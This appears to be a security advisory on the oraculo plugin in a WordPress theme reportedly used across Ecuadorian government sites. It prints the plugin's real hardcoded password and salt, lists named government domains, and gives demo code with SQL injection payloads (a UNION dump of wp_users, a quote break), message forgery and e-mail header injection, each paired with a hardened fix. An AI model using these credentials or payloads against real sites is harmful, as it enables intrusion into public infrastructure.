ODINT

Oraculo Credentials

Oraculo Plugin — Exposed Credentials


Hardcoded Credentials

Password: SNAPsitio30v
Salt: ALRTOPER984TNMGDGFDH

These two values are the fixed inputs to the plugin's MCrypt-based encrypt()/decrypt() wrappers, which protect data exchanged between the centralized oraculo management server and each government WordPress site. Because both are constants in the theme source rather than per-site secrets, every deployment ends up with the same key, and so does anyone who obtains a copy of the theme.

Impact

The Sitio-32 theme, with the oraculo plugin bundled, is deployed across Ecuador's government (.gob.ec) WordPress sites, including:

  • presidencia.gob.ec (Presidency)
  • vicepresidencia.gob.ec (Vice Presidency)
  • comunicacion.gob.ec (Government Communications)
  • ecu911.gob.ec (Emergency Services)
  • arcotel.gob.ec (Telecom Regulator)
  • aduana.gob.ec (Customs)
  • And potentially hundreds more .gob.ec domains

Because the password and salt are the same on every site, anyone holding them can:

  1. Decrypt any data the oraculo plugin has encrypted, on any deployment that uses these constants
  2. Forge encrypted payloads that the receiving side accepts as genuine, since MCrypt itself adds no integrity check, and use them to inject content
  3. Chain this with the SQL injection vectors in the same theme for full database compromise
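
How the shared constants translate into the three consequences listed above, as an added example (not the oraculo plugin's code). The plugin's actual key derivation and MCrypt cipher mode are not shown on this page, so the example substitutes PBKDF2 for key derivation and a SHA-256 counter-mode keystream for the cipher; the function names and the JSON messages are assumptions made for the demo. What carries over is the mechanism: a key computed from constants in the source is available to anyone with the source, and a cipher with no integrity tag accepts anything encrypted under that key. The hardened form beside it uses a random per-deployment key and encrypt-then-MAC.

```python
"""Added example, not code from the oraculo plugin. The real key derivation and
cipher mode are not on the page; PBKDF2 and a SHA-256 counter-mode keystream
stand in for them. Like mcrypt, the legacy stand-in has no integrity tag."""
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constants as exposed in the theme source (copied from the finding above).
LEAKED_PASSWORD = b"SNAPsitio30v"
LEAKED_SALT = b"ALRTOPER984TNMGDGFDH"
NONCE_LEN = 16
TAG_LEN = 32


def derive_key(password: bytes, salt: bytes) -> bytes:
    """Deterministic: every site, and every reader of the source, gets this key."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000, dklen=32)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """SHA-256 in counter mode; stand-in for the block cipher (assumption)."""
    blocks = []
    for counter in range((length + 31) // 32):
        blocks.append(hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest())
    return b"".join(blocks)[:length]


def legacy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Stand-in for the plugin's encrypt(): nonce || plaintext XOR keystream, no MAC."""
    nonce = os.urandom(NONCE_LEN)
    stream = _keystream(key, nonce, len(plaintext))
    return nonce + bytes(p ^ k for p, k in zip(plaintext, stream))


def legacy_decrypt(key: bytes, blob: bytes) -> bytes:
    """Stand-in for decrypt(): accepts any input, there is nothing to verify."""
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return bytes(c ^ k for c, k in zip(body, _keystream(key, nonce, len(body))))


def secure_encrypt(site_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC under a key that exists only on this deployment."""
    enc_key = hmac.new(site_key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(site_key, b"mac", hashlib.sha256).digest()
    blob = legacy_encrypt(enc_key, plaintext)
    return blob + hmac.new(mac_key, blob, hashlib.sha256).digest()


def secure_decrypt(site_key: bytes, blob: bytes) -> Optional[bytes]:
    """Returns None, rather than garbage, for anything not produced under site_key."""
    enc_key = hmac.new(site_key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(site_key, b"mac", hashlib.sha256).digest()
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return legacy_decrypt(enc_key, body)


def demo() -> Dict[str, bool]:
    """Walk through the consequences listed above; every value should be True."""
    # Management server and site share the key derived from the leaked constants.
    shared_key = derive_key(LEAKED_PASSWORD, LEAKED_SALT)
    message = b'{"site":"example","action":"update","html":"<p>ok</p>"}'  # constructed
    on_the_wire = legacy_encrypt(shared_key, message)

    # 1. Anyone who read the theme source derives the same key and reads the payload.
    attacker_key = derive_key(LEAKED_PASSWORD, LEAKED_SALT)
    recovered = legacy_decrypt(attacker_key, on_the_wire)

    # 2. With no integrity tag, a forged payload decrypts cleanly on the receiving site.
    forged = legacy_encrypt(attacker_key, b'{"action":"update","html":"<script>injected</script>"}')
    accepted = legacy_decrypt(shared_key, forged)

    # Hardened: random per-deployment key (kept outside the theme) plus a MAC.
    site_key = os.urandom(32)
    genuine = secure_encrypt(site_key, message)
    tampered = genuine[:NONCE_LEN] + bytes([genuine[NONCE_LEN] ^ 0x01]) + genuine[NONCE_LEN + 1:]
    return {
        "attacker_recovered_plaintext": recovered == message,
        "forgery_accepted_by_legacy": b"injected" in accepted,
        "genuine_accepted_by_secure": secure_decrypt(site_key, genuine) == message,
        "forgery_rejected_by_secure": secure_decrypt(site_key, forged) is None,
        "tampering_rejected_by_secure": secure_decrypt(site_key, tampered) is None,
    }
```

The key point is in derive_key: it takes nothing that differs between deployments, so the management server, every site and every attacker compute the same output. The hardened path needs both changes, a per-site random key and the MAC; a random key alone still leaves forgery open to anyone who obtains it, and a MAC over the shared constants would be computable by everyone who has the source.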

SQL Injection Vectors

ajax_selects.php

// $_POST['identificador'] is used as-is in a numeric comparison: no cast, no escaping,
// no prepared statement, so "1 OR 1=1" or a UNION SELECT becomes part of the query.
$id = $_POST['identificador'];
"...where relacion=" . $id . "..."

procesarContacto.php

// Form fields are interpolated inside single quotes; a quote in any value breaks out
// of the string literal and the remainder of the statement is attacker-controlled.
$nombre = $_POST['nombre'];
"INSERT INTO contacto (nombre, apellido, cedula...) VALUES('$nombre','$apellido'..."

Both queries should be built with $wpdb->prepare() (or an equivalent bound-parameter API) instead of string concatenation.
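
Both patterns reproduced against a constructed in-memory SQLite database, as an added example rather than the theme's code, beside the bound-parameter form that closes them. Only contacto(nombre, apellido, cedula) is named on the page; the opciones table, its columns, the wp_users row with its sample hash and the payloads are assumptions made for the demo. SQLite stands in for MySQL; the two payloads are valid syntax in both, and in WordPress the bound form corresponds to $wpdb->prepare() with %d and %s placeholders.

```python
"""Added example (not code from the Sitio-32 theme): the two injection patterns
above against a constructed SQLite database, next to the bound-parameter form.
Table/column names other than contacto(nombre, apellido, cedula) are assumptions."""
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in schema; the wp_users hash is a made-up sample."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE opciones (id INTEGER, nombre TEXT, relacion INTEGER);
        INSERT INTO opciones VALUES (1,'Pichincha',10),(2,'Guayas',10),(3,'Azuay',20);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1,'admin','$P$BconstructedSampleHashNotReal');
        CREATE TABLE contacto (nombre TEXT, apellido TEXT, cedula TEXT);
    """)
    return con


def vulnerable_select(con: sqlite3.Connection, identificador: str) -> List[Tuple]:
    """ajax_selects.php pattern: the POST value is glued into the WHERE clause."""
    sql = "SELECT id, nombre FROM opciones WHERE relacion=" + identificador
    return con.execute(sql).fetchall()


def safe_select(con: sqlite3.Connection, identificador: str) -> List[Tuple]:
    """Numeric context: coerce, then bind (what $wpdb->prepare('... = %d') does)."""
    return con.execute(
        "SELECT id, nombre FROM opciones WHERE relacion=?", (int(identificador),)
    ).fetchall()


def vulnerable_insert(con: sqlite3.Connection, nombre: str, apellido: str, cedula: str) -> List[Tuple]:
    """procesarContacto.php pattern: values interpolated inside single quotes."""
    sql = ("INSERT INTO contacto (nombre, apellido, cedula) "
           f"VALUES('{nombre}','{apellido}','{cedula}')")
    con.execute(sql)
    return con.execute("SELECT nombre, apellido, cedula FROM contacto").fetchall()


def safe_insert(con: sqlite3.Connection, nombre: str, apellido: str, cedula: str) -> List[Tuple]:
    """String context: bind every value; quotes in the input stay data."""
    con.execute("INSERT INTO contacto (nombre, apellido, cedula) VALUES(?,?,?)",
                (nombre, apellido, cedula))
    return con.execute("SELECT nombre, apellido, cedula FROM contacto").fetchall()


# Constructed payloads: the first reads another table through the numeric context,
# the second closes the VALUES list early and comments out the trailing columns.
UNION_PAYLOAD = "0 UNION SELECT user_login, user_pass FROM wp_users"
QUOTE_PAYLOAD = "Mallory','x','0') -- "


def demo() -> Dict[str, object]:
    con = make_db()
    results: Dict[str, object] = {
        "intended": vulnerable_select(con, "10"),
        "dumped_via_union": vulnerable_select(con, UNION_PAYLOAD),
        "rows_after_quote_break": vulnerable_insert(con, QUOTE_PAYLOAD, "Perez", "1234"),
    }
    try:
        safe_select(con, UNION_PAYLOAD)
        results["union_blocked"] = False
    except ValueError:  # int() refuses anything that is not a number
        results["union_blocked"] = True
    results["rows_with_binding"] = safe_insert(make_db(), QUOTE_PAYLOAD, "Perez", "1234")
    return results
```

With binding, the quote payload is stored verbatim as a name and apellido/cedula keep the values the form sent; without it the attacker chooses every column, and the UNION payload turns a dropdown-population endpoint into a read of the users table.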

Additional Findings

  • MCrypt has been deprecated since PHP 7.1 and was removed from core in PHP 7.2 (available afterwards only as a PECL extension), so the plugin's encrypt()/decrypt() calls fail on current PHP unless the legacy extension is installed
  • No CSRF protection on form handlers (e.g. no WordPress nonce check before POST data is processed)
  • No validation or sanitization of POST parameters
  • User-supplied values placed in e-mail headers without stripping CR/LF, allowing header injection
  • Mobile-Detect 2.8.17 bundled, an outdated release
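
The header injection named above, as an added example that is not the theme's code: a header builder of the kind behind the finding, a splitter that shows the header names a mail server would actually see, and a builder that rejects the input. The field names, addresses and payload are constructed for the demo.

```python
"""Added example (not the theme's code): e-mail header injection through a
contact-form field, and the check that stops it. Names and payload are constructed."""
import re
from typing import Dict, List

CRLF = "\r\n"
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def vulnerable_headers(nombre: str, email: str) -> str:
    """Additional headers the way a contact form might hand them to PHP's mail()."""
    return f"From: {nombre} <{email}>{CRLF}Reply-To: {email}{CRLF}"


def header_names(raw: str) -> List[str]:
    """Header names as a mail server reads them: one per CRLF-delimited line."""
    return [line.split(":", 1)[0] for line in raw.split(CRLF) if ":" in line]


def safe_headers(nombre: str, email: str) -> str:
    """Reject line breaks outright and validate the address before it reaches a header."""
    for value in (nombre, email):
        if "\r" in value or "\n" in value:
            raise ValueError("line break in header value")
    if not ADDR_RE.match(email):
        raise ValueError("invalid e-mail address")
    nombre = nombre.replace('"', "")  # keep the display name one quoted phrase
    return f'From: "{nombre}" <{email}>{CRLF}Reply-To: {email}{CRLF}'


# Constructed payload: a valid-looking address followed by two injected header lines.
INJECTED = "victim@example.com\r\nBcc: attacker@example.net\r\nX-Injected: yes"


def demo() -> Dict[str, object]:
    vuln = vulnerable_headers("Juan", INJECTED)
    try:
        safe_headers("Juan", INJECTED)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "injected_names": header_names(vuln),   # Bcc and X-Injected appear, twice each
        "blocked": blocked,
        "clean": header_names(safe_headers("Juan", "juan@example.com")),
    }
```

The check is deliberately a rejection rather than a strip: a value that contains CR or LF was never a name or an address, and silently removing the bytes hides the probing from the logs.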